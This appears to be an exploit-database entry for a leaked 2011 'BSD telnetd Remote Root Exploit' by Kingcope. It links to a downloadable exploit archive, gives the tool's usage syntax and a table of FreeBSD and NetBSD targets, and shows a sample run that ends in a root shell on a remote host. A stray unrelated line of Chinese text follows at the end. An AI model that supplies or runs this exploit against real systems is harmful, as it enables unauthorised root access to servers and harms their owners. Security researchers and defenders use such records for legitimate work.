This exploit was leaked on the Full Disclosure mailing list: http://seclists.org/fulldisclosure/2012/Jun/404 Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19520.zip BSD telnetd Remote Root Exploit *ZERODAY* By Kingcope Year 2011 usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d] [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name [port]] TARGETS: 0 FreeBSD 8.2 i386 1 FreeBSD 8.0/8.1/8.2 i386 2 FreeBSD 7.3/7.4 i386 3 FreeBSD 6.2/6.3/6.4 i386 4 FreeBSD 5.3/5.5 i386 5 FreeBSD 4.9/4.11 i386 6 NetBSD 5.0/5.1 i386 7 NetBSD 4.0 i386 8 FreeBSD 8.2 amd64 9 FreeBSD 8.0/8.1 amd64 10 FreeBSD 7.1/7.3/7.4 amd64 11 FreeBSD 7.1 amd64 12 FreeBSD 7.0 amd64 13 FreeBSD 6.4 amd64 14 FreeBSD 6.3 amd64 15 FreeBSD 6.2 amd64 16 FreeBSD 6.1 amd64 17 TESTING i386 18 TESTING amd64 Trying 192.168.2.8... Connected to 192.168.2.8. Escape character is '^]'. Trying SRA secure login: *** EXPLOITING REMOTE TELNETD *** by Kingcope *** Year 2011 USING TARGET -- FreeBSD 8.2 amd64 SC LEN: 30 ALEX-ALEX 6:36PMup 5 mins, 1 user, load averages: 0.01, 0.15, 0.09 USER TTYFROMLOGIN@IDLE WHAT kcopepts/0192.168.2.3 6:32PM 4 _su (csh) FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011 root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERICamd64 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
体验盒子
